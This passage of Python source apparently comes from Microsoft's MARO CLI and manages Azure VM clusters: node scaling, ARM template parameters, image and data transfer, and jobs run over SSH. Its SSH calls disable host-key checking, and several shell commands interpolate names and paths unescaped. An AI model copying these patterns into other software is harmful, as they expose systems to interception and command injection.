raise BadRequestError(f"Invalid node_size '{node_size}'.")
# Scale nodes
if node_size_to_count[node_size] > replicas:
self._delete_nodes(
num=node_size_to_count[node_size] - replicas,
node_size=node_size
)
elif node_size_to_count[node_size] < replicas:
self._create_nodes(
num=replicas - node_size_to_count[node_size],
node_size=node_size,
node_size_to_spec=node_size_to_spec
)
else:
logger.warning_yellow("Replica is match, no create or delete")
def _create_nodes(self, num: int, node_size: str, node_size_to_spec: dict) -> None:
logger.info(f"Scaling up {num}")
# Parallel create
with ThreadPool(GlobalParams.PARALLELS) as pool:
pool.starmap(
self._create_node,
[[node_size, node_size_to_spec]] * num
)
def _create_node(self, node_size: str, node_size_to_spec: dict):
# Generate node name
node_name = generate_node_name()
logger.info(message=f"Creating node {node_name}")
# Create node
self._create_vm(
node_name=node_name,
node_size=node_size,
node_size_to_spec=node_size_to_spec
)
# Init node
self._init_node(
node_name=node_name
)
logger.info_green(message=f"Node {node_name} is created")
def _delete_nodes(self, num: int, node_size: str) -> None:
# Load details
nodes_details = self.grass_executor.remote_get_nodes_details()
# Get deletable_nodes and check, TODO: consider to add -f
deletable_nodes = []
for node_name, node_details in nodes_details.items():
if node_details["node_size"] == node_size and len(node_details["containers"]) == 0:
deletable_nodes.append(node_name)
if len(deletable_nodes) >= num:
logger.info(f"Scaling down {num}")
# Parallel delete
params = [[deletable_node] for deletable_node in deletable_nodes[:num]]
with ThreadPool(GlobalParams.PARALLELS) as pool:
pool.starmap(
self._delete_node,
params
)
else:
logger.warning_yellow(
"Unable to scale down."
f" Only {len(deletable_nodes)} are deletable, but need to delete {num} to meet the replica"
)
def _create_vm(self, node_name: str, node_size: str, node_size_to_spec: dict):
logger.info(message=f"Creating VM {node_name}")
# Load details
location = self.cluster_details["cloud"]["location"]
cluster_id = self.cluster_details["id"]
resource_group = self.cluster_details["cloud"]["resource_group"]
image_name = f"{cluster_id}-node-image"
image_resource_id = AzureExecutor.get_image_resource_id(resource_group=resource_group, image_name=image_name)
# Create ARM parameters and start deployment
template_file_path = f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_node/template.json"
parameters_file_path = (
f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_{node_name}/parameters.json"
)
ArmTemplateParameterBuilder.create_node(
node_name=node_name,
cluster_details=self.cluster_details,
node_size=node_size,
image_resource_id=image_resource_id,
export_path=parameters_file_path
)
AzureExecutor.start_deployment(
resource_group=resource_group,
deployment_name=node_name,
template_file_path=template_file_path,
parameters_file_path=parameters_file_path
)
# Get node IP addresses
ip_addresses = AzureExecutor.list_ip_addresses(
resource_group=resource_group,
vm_name=f"{cluster_id}-{node_name}-vm"
)
# Get sku and check gpu nums
gpu_nums = 0
node_size_sku = AzureExecutor.get_sku(
vm_size=node_size, location=location)
if node_size_sku is not None:
for capability in node_size_sku["capabilities"]:
if capability["name"] == "GPUs":
gpu_nums = int(capability["value"])
break
# Save details
node_details = {
"name": node_name,
"id": node_name,
"public_ip_address": ip_addresses[0]["virtualMachine"]["network"]["publicIpAddresses"][0]["ipAddress"],
"private_ip_address": ip_addresses[0]["virtualMachine"]["network"]["privateIpAddresses"][0],
"node_size": node_size,
"resource_name": f"{cluster_id}-{node_name}-vm",
"hostname": f"{cluster_id}-{node_name}-vm",
"resources": {
"cpu": node_size_to_spec[node_size]["numberOfCores"],
"memory": node_size_to_spec[node_size]["memoryInMb"],
"gpu": gpu_nums
},
"containers": {}
}
self.grass_executor.remote_set_node_details(
node_name=node_name,
node_details=node_details,
)
logger.info_green(f"VM {node_name} is created")
def _delete_node(self, node_name: str):
logger.info(f"Deleting node {node_name}")
# Load details
resource_group = self.cluster_details["cloud"]["resource_group"]
# Delete resources
self._delete_resources(resource_name=node_name)
# Delete azure deployment
AzureExecutor.delete_deployment(
resource_group=resource_group,
deployment_name=node_name
)
# Delete parameters_file
shutil.rmtree(f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/azure/create_{node_name}")
# Update node status
self.grass_executor.remote_update_node_status(
node_name=node_name,
action="delete"
)
logger.info_green(f"Node {node_name} is deleted")
def _init_node(self, node_name: str):
logger.info(f"Initiating node {node_name}")
# Load details
admin_username = self.cluster_details["user"]["admin_username"]
node_details = self.grass_executor.remote_get_node_details(node_name=node_name)
node_public_ip_address = node_details["public_ip_address"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
# Make sure the node is able to connect
self.grass_executor.retry_connection_and_set_ssh_port(node_ip_address=node_public_ip_address)
# Copy required files
self._sync_mkdir(path=f"{GlobalPaths.MARO_LOCAL_TMP}", node_ip_address=node_public_ip_address)
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_GRASS_LIB}/scripts/init_node.py",
remote_dir="~/",
admin_username=admin_username, node_ip_address=node_public_ip_address, ssh_port=ssh_port
)
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/details.yml",
remote_dir="~/",
admin_username=admin_username, node_ip_address=node_public_ip_address, ssh_port=ssh_port
)
# Remote init node
self.grass_executor.remote_init_node(
node_name=node_name,
node_ip_address=node_public_ip_address
)
# Get public key
public_key = self.grass_executor.remote_get_public_key(node_ip_address=node_public_ip_address)
# Save details
node_details["public_key"] = public_key
self.grass_executor.remote_set_node_details(
node_name=node_name,
node_details=node_details
)
# Update node status
self.grass_executor.remote_update_node_status(
node_name=node_name,
action="create"
)
# Load images
self.grass_executor.remote_load_images(
node_name=node_name,
parallels=GlobalParams.PARALLELS,
node_ip_address=node_public_ip_address
)
# Load node agent service
self.grass_executor.remote_load_node_agent_service(
node_name=node_name,
node_ip_address=node_public_ip_address
)
logger.info_green(f"Node {node_name} is initialized")
def start_node(self, replicas: int, node_size: str):
# Get nodes details
nodes_details = self.grass_executor.remote_get_nodes_details()
# Get startable nodes
startable_nodes = []
for node_name, node_details in nodes_details.items():
if node_details["node_size"] == node_size and node_details["state"] == "Stopped":
startable_nodes.append(node_name)
# Check replicas
if len(startable_nodes) < replicas:
raise BadRequestError(
f"No enough '{node_size}' nodes can be started (only {len(startable_nodes)} is startable)."
)
# Parallel start
params = [[startable_node] for startable_node in startable_nodes[:replicas]]
with ThreadPool(GlobalParams.PARALLELS) as pool:
pool.starmap(
self._start_node,
params
)
def _start_node(self, node_name: str):
logger.info(f"Starting node {node_name}")
# Load details
cluster_id = self.cluster_details["id"]
resource_group = self.cluster_details["cloud"]["resource_group"]
node_details = self.grass_executor.remote_get_node_details(node_name=node_name)
node_public_ip_address = node_details["public_ip_address"]
# Start node
AzureExecutor.start_vm(
resource_group=resource_group,
vm_name=f"{cluster_id}-{node_name}-vm"
)
# Update node status
self.grass_executor.remote_update_node_status(
node_name=node_name,
action="start"
)
# Make sure the node is able to connect
self.grass_executor.retry_connection_and_set_ssh_port(
node_ip_address=node_public_ip_address
)
# Load images
self.grass_executor.remote_load_images(
node_name=node_name,
parallels=GlobalParams.PARALLELS,
node_ip_address=node_public_ip_address
)
# Load node agent service
self.grass_executor.remote_load_node_agent_service(
node_name=node_name,
node_ip_address=node_public_ip_address
)
logger.info_green(f"Node {node_name} is started")
def stop_node(self, replicas: int, node_size: str):
# Get nodes details
nodes_details = self.grass_executor.remote_get_nodes_details()
# Get stoppable nodes
stoppable_nodes = []
for node_name, node_details in nodes_details.items():
if (
node_details["node_size"] == node_size and
node_details["state"] == "Running" and
self._count_running_containers(node_details) == 0
):
stoppable_nodes.append(node_name)
# Check replicas
if len(stoppable_nodes) < replicas:
raise BadRequestError(
f"No more '{node_size}' nodes can be stopped, only {len(stoppable_nodes)} are stoppable."
)
# Parallel stop
params = [[stoppable_node] for stoppable_node in stoppable_nodes[:replicas]]
with ThreadPool(GlobalParams.PARALLELS) as pool:
pool.starmap(
self._stop_node,
params
)
def _stop_node(self, node_name: str):
logger.info(f"Stopping node {node_name}")
# Load details
cluster_id = self.cluster_details["id"]
resource_group = self.cluster_details["cloud"]["resource_group"]
# Stop node
AzureExecutor.stop_vm(
resource_group=resource_group,
vm_name=f"{cluster_id}-{node_name}-vm"
)
# Update node status
self.grass_executor.remote_update_node_status(
node_name=node_name,
action="stop"
)
logger.info_green(f"Node {node_name} is stopped")
def _get_node_size_to_spec(self) -> dict:
# Load details
location = self.cluster_details["cloud"]["location"]
# List available sizes for VMs
specs = AzureExecutor.list_vm_sizes(location=location)
# Get node_size_to_spec
node_size_to_spec = {}
for spec in specs:
node_size_to_spec[spec["name"]] = spec
return node_size_to_spec
def list_node(self):
# Get nodes details
nodes_details = self.grass_executor.remote_get_nodes_details()
# Print details
logger.info(
json.dumps(
nodes_details,
indent=4, sort_keys=True
)
)
@staticmethod
def _count_running_containers(node_details: dict):
# Extract details
containers_details = node_details["containers"]
# Do counting
count = 0
for container_details in containers_details:
if container_details["Status"] == "running":
count += 1
return count
# maro grass image
def push_image(
self, image_name: str, image_path: str, remote_context_path: str,
remote_image_name: str
):
# Load details
admin_username = self.cluster_details["user"]["admin_username"]
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
# Get images dir
images_dir = f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/images"
# Push image
if image_name:
new_file_name = get_valid_file_name(image_name)
abs_image_path = f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/images/{new_file_name}"
self._save_image(
image_name=image_name,
export_path=abs_image_path
)
if self._check_checksum_validity(
local_file_path=abs_image_path,
remote_file_path=os.path.join(images_dir, image_name)
):
logger.info_green(f"The image file '{new_file_name}' already exists")
return
copy_files_to_node(
local_path=abs_image_path,
remote_dir=images_dir,
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
self.grass_executor.remote_update_image_files_details()
self._batch_load_images()
logger.info_green(f"Image {image_name} is loaded")
elif image_path:
file_name = os.path.basename(image_path)
new_file_name = get_valid_file_name(file_name)
abs_image_path = f"{GlobalPaths.ABS_MARO_CLUSTERS}/{self.cluster_name}/images/{new_file_name}"
copy_and_rename(
source_path=abs_image_path,
target_dir=image_path
)
if self._check_checksum_validity(
local_file_path=abs_image_path,
remote_file_path=os.path.join(images_dir, new_file_name)
):
logger.info_green(f"The image file '{new_file_name}' already exists")
return
copy_files_to_node(
local_path=abs_image_path,
remote_dir=images_dir,
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
self.grass_executor.remote_update_image_files_details()
self._batch_load_images()
elif remote_context_path and remote_image_name:
self.grass_executor.remote_build_image(
remote_context_path=remote_context_path,
remote_image_name=remote_image_name
)
self._batch_load_images()
else:
raise BadRequestError("Invalid arguments.")
@staticmethod
def _save_image(image_name: str, export_path: str):
# Save image to specific folder
command = f"docker save '{image_name}' --output '{export_path}'"
_ = SubProcess.run(command)
def _batch_load_images(self):
# Load details
nodes_details = self.grass_executor.remote_get_nodes_details()
# build params
params = []
for node_name, node_details in nodes_details.items():
if node_details["state"] == "Running":
params.append([
node_name,
GlobalParams.PARALLELS,
node_details["public_ip_address"]
])
# Parallel load image
with ThreadPool(GlobalParams.PARALLELS) as pool:
pool.starmap(
self._load_image,
params
)
def _load_image(self, node_name: str, parallels: int, node_ip_address: str):
self.grass_executor.remote_load_images(
node_name=node_name,
parallels=parallels,
node_ip_address=node_ip_address
)
def _check_checksum_validity(self, local_file_path: str, remote_file_path: str) -> bool:
local_checksum = get_checksum(file_path=local_file_path)
remote_checksum = self.grass_executor.remote_get_checksum(
file_path=remote_file_path
)
return local_checksum == remote_checksum
# maro grass data
def push_data(self, local_path: str, remote_path: str):
# Load details
admin_username = self.cluster_details["user"]["admin_username"]
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
if not remote_path.startswith("/"):
raise FileOperationError(f"Invalid remote path: {remote_path}\nShould be started with '/'.")
copy_files_to_node(
local_path=local_path,
remote_dir=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/data{remote_path}",
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
def pull_data(self, local_path: str, remote_path: str):
# Load details
admin_username = self.cluster_details["user"]["admin_username"]
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
if not remote_path.startswith("/"):
raise FileOperationError(f"Invalid remote path: {remote_path}\nShould be started with '/'.")
copy_files_from_node(
local_dir=local_path,
remote_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/data{remote_path}",
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
# maro grass job
def start_job(self, deployment_path: str):
# Load start_job_deployment
with open(deployment_path, "r") as fr:
start_job_deployment = yaml.safe_load(fr)
# Standardize start_job_deployment
self._standardize_start_job_deployment(start_job_deployment=start_job_deployment)
# Start job
self._start_job(
job_details=start_job_deployment
)
def _start_job(self, job_details: dict):
logger.info(f"Start sending job ticket {job_details['name']}")
# Load details
admin_username = self.cluster_details["user"]["admin_username"]
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
job_name = job_details["name"]
# Sync mkdir
self._sync_mkdir(
path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs/{job_name}",
node_ip_address=master_public_ip_address
)
# Save job deployment
save_job_details(
cluster_name=self.cluster_name,
job_name=job_name,
job_details=job_details
)
# Set job id
self._set_job_id(
job_name=job_name
)
# Sync job details to master
copy_files_to_node(
local_path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs/{job_name}/details.yml",
remote_dir=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/jobs/{job_name}",
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
# Remote start job
self.grass_executor.remote_create_job_details(job_name=job_name)
self.grass_executor.remote_create_pending_job_ticket(job_name=job_name)
logger.info_green(f"Job ticket {job_details['name']} is sent")
def stop_job(self, job_name: str):
# Remote stop job
self.grass_executor.remote_create_killed_job_ticket(job_name=job_name)
self.grass_executor.remote_delete_pending_job_ticket(job_name=job_name)
def list_job(self):
# Get jobs details
jobs_details = self.grass_executor.remote_get_jobs_details()
# Print details
logger.info(
json.dumps(
jobs_details,
indent=4, sort_keys=True
)
)
def get_job_logs(self, job_name: str, export_dir: str = "./"):
# Load details
job_details = load_job_details(
cluster_name=self.cluster_name,
job_name=job_name
)
admin_username = self.cluster_details["user"]["admin_username"]
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
ssh_port = self.cluster_details["connection"]["ssh"]["port"]
job_id = job_details["id"]
# Copy logs from master
try:
copy_files_from_node(
local_dir=export_dir,
remote_path=f"~/.maro/logs/{job_id}",
admin_username=admin_username, node_ip_address=master_public_ip_address, ssh_port=ssh_port
)
except CommandExecutionError:
logger.error_red("No logs have been created at this time.")
@staticmethod
def _standardize_start_job_deployment(start_job_deployment: dict):
# Validate grass_azure_start_job
optional_key_to_value = {
"root['tags']": {}
}
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/grass_azure_start_job.yml") as fr:
start_job_template = yaml.safe_load(fr)
validate_and_fill_dict(
template_dict=start_job_template,
actual_dict=start_job_deployment,
optional_key_to_value=optional_key_to_value
)
# Validate component
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/component.yml", "r") as fr:
start_job_component_template = yaml.safe_load(fr)
components_details = start_job_deployment["components"]
for _, component_details in components_details.items():
validate_and_fill_dict(
template_dict=start_job_component_template,
actual_dict=component_details,
optional_key_to_value={}
)
def _set_job_id(self, job_name: str):
# Load details
job_details = load_job_details(cluster_name=self.cluster_name, job_name=job_name)
# Set cluster id
job_details["id"] = generate_job_id()
# Set component id
for component, component_details in job_details["components"].items():
component_details["id"] = generate_component_id()
# Save details
save_job_details(
cluster_name=self.cluster_name,
job_name=job_name,
job_details=job_details
)
# maro grass schedule
def start_schedule(self, deployment_path: str):
# Load start_schedule_deployment
with open(deployment_path, "r") as fr:
start_schedule_deployment = yaml.safe_load(fr)
# Standardize start_schedule_deployment
self._standardize_start_schedule_deployment(start_schedule_deployment=start_schedule_deployment)
schedule_name = start_schedule_deployment["name"]
# Load details
master_public_ip_address = self.cluster_details["master"]["public_ip_address"]
# Sync mkdir
self._sync_mkdir(
path=f"{GlobalPaths.MARO_CLUSTERS}/{self.cluster_name}/schedules/{schedule_name}",
node_ip_address=master_public_ip_address
)
# Save schedule deployment
save_schedule_details(
cluster_name=self.cluster_name,
schedule_name=schedule_name,
schedule_details=start_schedule_deployment
)
# Start jobs
for job_name in start_schedule_deployment["job_names"]:
job_details = self._build_job_details(
schedule_details=start_schedule_deployment,
job_name=job_name
)
self._start_job(
job_details=job_details
)
def stop_schedule(self, schedule_name: str):
# Load details
schedule_details = load_schedule_details(cluster_name=self.cluster_name, schedule_name=schedule_name)
job_names = schedule_details["job_names"]
for job_name in job_names:
# Load job details
job_details = load_job_details(cluster_name=self.cluster_name, job_name=job_name)
job_schedule_tag = job_details["tags"]["schedule"]
# Remote stop job
if job_schedule_tag == schedule_name:
self.grass_executor.remote_create_killed_job_ticket(job_name=job_name)
self.grass_executor.remote_delete_pending_job_ticket(job_name=job_name)
@staticmethod
def _standardize_start_schedule_deployment(start_schedule_deployment: dict):
# Validate grass_azure_start_job
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/grass_azure_start_schedule.yml") as fr:
start_job_template = yaml.safe_load(fr)
validate_and_fill_dict(
template_dict=start_job_template,
actual_dict=start_schedule_deployment,
optional_key_to_value={}
)
# Validate component
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/deployments/internal/component.yml") as fr:
start_job_component_template = yaml.safe_load(fr)
components_details = start_schedule_deployment["components"]
for _, component_details in components_details.items():
validate_and_fill_dict(
template_dict=start_job_component_template,
actual_dict=component_details,
optional_key_to_value={}
)
@staticmethod
def _build_job_details(schedule_details: dict, job_name: str) -> dict:
schedule_name = schedule_details["name"]
job_details = deepcopy(schedule_details)
job_details["name"] = job_name
job_details["tags"] = {
"schedule": schedule_name
}
job_details.pop("job_names")
return job_details
# maro grass clean
def clean(self):
# TODO add clean redis
# Remote clean
self.grass_executor.remote_clean(parallels=GlobalParams.PARALLELS)
# maro grass status
def status(self, resource_name: str):
if resource_name == "master":
return_status = self.grass_executor.remote_get_master_details()
elif resource_name == "nodes":
return_status = self.grass_executor.remote_get_nodes_details()
elif resource_name == "containers":
return_status = self.grass_executor.remote_get_containers_details()
else:
raise BadRequestError(f"Resource '{resource_name}' is unsupported.")
# Print status
logger.info(
json.dumps(
return_status,
indent=4, sort_keys=True
)
)
# maro grass template
@staticmethod
def template(export_path: str):
# Get templates
command = f"cp {GlobalPaths.MARO_GRASS_LIB}/deployments/external/* {export_path}"
_ = SubProcess.run(command)
# Utils
def _delete_resources(self, resource_name: str):
# Get params
cluster_id = self.cluster_details["id"]
resource_group = self.cluster_details["cloud"]["resource_group"]
# Get resource list
resource_list = AzureExecutor.list_resources(resource_group=resource_group)
# Filter resources
deletable_ids = []
for resource_info in resource_list:
if resource_info["name"].startswith(f"{cluster_id}-{resource_name}"):
deletable_ids.append(resource_info["id"])
# Delete resources
if len(deletable_ids) > 0:
AzureExecutor.delete_resources(resources=deletable_ids)
def _sync_mkdir(self, path: str, node_ip_address: str):
"""Mkdir synchronously at local and remote.
Args:
path (str): path of the file, should be a string with an initial component of ~ or ~user
node_ip_address (str): ip address of the remote node
"""
# Create local dir
os.makedirs(os.path.expanduser(path), exist_ok=True)
# Create remote dir
self.grass_executor.remote_mkdir(node_ip_address=node_ip_address, path=path)
class ArmTemplateParameterBuilder:
@staticmethod
def create_vnet(cluster_details: dict, export_path: str) -> dict:
# Get params
cluster_id = cluster_details["id"]
location = cluster_details["cloud"]["location"]
# Load and update parameters
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_vnet/parameters.json", "r") as f:
base_parameters = json.load(f)
parameters = base_parameters["parameters"]
parameters["location"]["value"] = location
parameters["virtualNetworkName"]["value"] = f"{cluster_id}-vnet"
# Export parameters if the path is set
if export_path:
os.makedirs(os.path.dirname(export_path), exist_ok=True)
with open(export_path, "w") as fw:
json.dump(base_parameters, fw, indent=4)
return base_parameters
@staticmethod
def create_master(cluster_details: dict, node_size: str, export_path: str) -> dict:
# Get params
resource_name = "master"
cluster_id = cluster_details["id"]
location = cluster_details["cloud"]["location"]
admin_username = cluster_details["user"]["admin_username"]
admin_public_key = cluster_details["user"]["admin_public_key"]
ssh_port = cluster_details["connection"]["ssh"]["port"]
# Load and update parameters
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_master/parameters.json", "r") as f:
base_parameters = json.load(f)
parameters = base_parameters["parameters"]
parameters["location"]["value"] = location
parameters["networkInterfaceName"]["value"] = f"{cluster_id}-{resource_name}-nic"
parameters["networkSecurityGroupName"]["value"] = f"{cluster_id}-{resource_name}-nsg"
parameters["virtualNetworkName"]["value"] = f"{cluster_id}-vnet"
parameters["publicIpAddressName"]["value"] = f"{cluster_id}-{resource_name}-pip"
parameters["virtualMachineName"]["value"] = f"{cluster_id}-{resource_name}-vm"
parameters["virtualMachineSize"]["value"] = node_size
parameters["adminUsername"]["value"] = admin_username
parameters["adminPublicKey"]["value"] = admin_public_key
parameters["sshDestinationPort"]["value"] = f"{ssh_port}"
# Export parameters if the path is set
if export_path:
os.makedirs(os.path.dirname(export_path), exist_ok=True)
with open(export_path, "w") as fw:
json.dump(base_parameters, fw, indent=4)
return base_parameters
@staticmethod
def create_build_node_image_vm(cluster_details: dict, node_size: str, export_path: str) -> dict:
# Get params
resource_name = "build-node-image"
cluster_id = cluster_details["id"]
location = cluster_details["cloud"]["location"]
admin_username = cluster_details["user"]["admin_username"]
admin_public_key = cluster_details["user"]["admin_public_key"]
ssh_port = cluster_details["connection"]["ssh"]["port"]
# Load and update parameters
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_build_node_image_vm/parameters.json", "r") as f:
base_parameters = json.load(f)
parameters = base_parameters["parameters"]
parameters["location"]["value"] = location
parameters["networkInterfaceName"]["value"] = f"{cluster_id}-{resource_name}-nic"
parameters["networkSecurityGroupName"]["value"] = f"{cluster_id}-{resource_name}-nsg"
parameters["virtualNetworkName"]["value"] = f"{cluster_id}-vnet"
parameters["publicIpAddressName"]["value"] = f"{cluster_id}-{resource_name}-pip"
parameters["virtualMachineName"]["value"] = f"{cluster_id}-{resource_name}-vm"
parameters["virtualMachineSize"]["value"] = node_size
parameters["adminUsername"]["value"] = admin_username
parameters["adminPublicKey"]["value"] = admin_public_key
parameters["sshDestinationPort"]["value"] = f"{ssh_port}"
# Export parameters if the path is set
if export_path:
os.makedirs(os.path.dirname(export_path), exist_ok=True)
with open(export_path, "w") as fw:
json.dump(base_parameters, fw, indent=4)
return base_parameters
@staticmethod
def create_node(
node_name: str, cluster_details: dict,
node_size: str, image_resource_id: str,
export_path: str
) -> dict:
# Extract variables
resource_name = node_name
cluster_id = cluster_details["id"]
location = cluster_details["cloud"]["location"]
admin_username = cluster_details["user"]["admin_username"]
admin_public_key = cluster_details["user"]["admin_public_key"]
ssh_port = cluster_details["connection"]["ssh"]["port"]
# Load and update parameters
with open(f"{GlobalPaths.ABS_MARO_GRASS_LIB}/azure/create_node/parameters.json", "r") as f:
base_parameters = json.load(f)
parameters = base_parameters["parameters"]
parameters["location"]["value"] = location
parameters["networkInterfaceName"]["value"] = f"{cluster_id}-{resource_name}-nic"
parameters["networkSecurityGroupName"]["value"] = f"{cluster_id}-{resource_name}-nsg"
parameters["virtualNetworkName"]["value"] = f"{cluster_id}-vnet"
parameters["publicIpAddressName"]["value"] = f"{cluster_id}-{resource_name}-pip"
parameters["virtualMachineName"]["value"] = f"{cluster_id}-{resource_name}-vm"
parameters["virtualMachineSize"]["value"] = node_size
parameters["imageResourceId"]["value"] = image_resource_id
parameters["adminUsername"]["value"] = admin_username
parameters["adminPublicKey"]["value"] = admin_public_key
parameters["sshDestinationPort"]["value"] = f"{ssh_port}"
# Export parameters if the path is set
if export_path:
os.makedirs(os.path.dirname(export_path), exist_ok=True)
with open(export_path, "w") as fw:
json.dump(base_parameters, fw, indent=4)
return base_parameters
--- FILE SEPARATOR ---
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import base64
import json
import time
from subprocess import TimeoutExpired
from maro.cli.utils.params import GlobalPaths
from maro.cli.utils.subprocess import SubProcess
from maro.utils.exception.cli_exception import CliError, ClusterInternalError
from maro.utils.logger import CliLogger
logger = CliLogger(name=__name__)
class GrassExecutor:
def __init__(self, cluster_details: dict):
self.cluster_details = cluster_details
self.cluster_name = cluster_details["name"]
self.admin_username = self.cluster_details["user"]["admin_username"]
self.ssh_port = self.cluster_details["connection"]["ssh"]["port"]
def remote_build_image(self, remote_context_path: str, remote_image_name: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.build_image "
f"{self.cluster_name} {remote_context_path} {remote_image_name}'"
)
_ = SubProcess.run(command)
def remote_clean(self, parallels: int):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.clean {self.cluster_name} {parallels}'"
)
_ = SubProcess.run(command)
def remote_get_checksum(self, file_path: str) -> str:
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_checksum {file_path}'"
)
return_str = SubProcess.run(command)
return return_str
def remote_get_jobs_details(self):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_jobs_details {self.cluster_name}'"
)
return_str = SubProcess.run(command)
return json.loads(return_str)
def remote_get_master_details(self):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_master_details {self.cluster_name}'"
)
return_str = SubProcess.run(command)
return json.loads(return_str)
def remote_get_node_details(self, node_name: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_node_details {self.cluster_name} {node_name}'"
)
return_str = SubProcess.run(command)
return json.loads(return_str)
def remote_get_nodes_details(self):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_nodes_details {self.cluster_name}'"
)
return_str = SubProcess.run(command)
return json.loads(return_str)
def remote_get_containers_details(self):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_containers_details {self.cluster_name}'"
)
return_str = SubProcess.run(command)
return json.loads(return_str)
def remote_get_public_key(self, node_ip_address: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.get_public_key'"
)
return_str = SubProcess.run(command).strip("\n")
logger.debug(return_str)
return return_str
def remote_init_build_node_image_vm(self, vm_ip_address: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{vm_ip_address} "
"'python3 ~/init_build_node_image_vm.py'"
)
SubProcess.interactive_run(command)
def remote_init_master(self):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.init_master {self.cluster_name}'"
)
SubProcess.interactive_run(command)
def remote_init_node(self, node_name: str, node_ip_address: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
f"'python3 ~/init_node.py {self.cluster_name} {node_name}'"
)
SubProcess.interactive_run(command)
def remote_mkdir(self, node_ip_address: str, path: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
f"'mkdir -p {path}'"
)
SubProcess.run(command)
def remote_load_images(self, node_name: str, parallels: int, node_ip_address: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.load_images "
f"{self.cluster_name} {node_name} {parallels}'"
)
SubProcess.interactive_run(command)
def remote_load_master_agent_service(self):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} "
f"{self.admin_username}@{self.cluster_details['master']['public_ip_address']} "
f"'cd {GlobalPaths.MARO_GRASS_LIB}; python3 -m scripts.load_master_agent_service {self.cluster_name}'"
)
_ = SubProcess.run(command)
def remote_load_node_agent_service(self, node_name: str, node_ip_address: str):
command = (
f"ssh -o StrictHostKeyChecking=no -p {self.ssh_port} {self.admin_username}@{node_ip_address} "
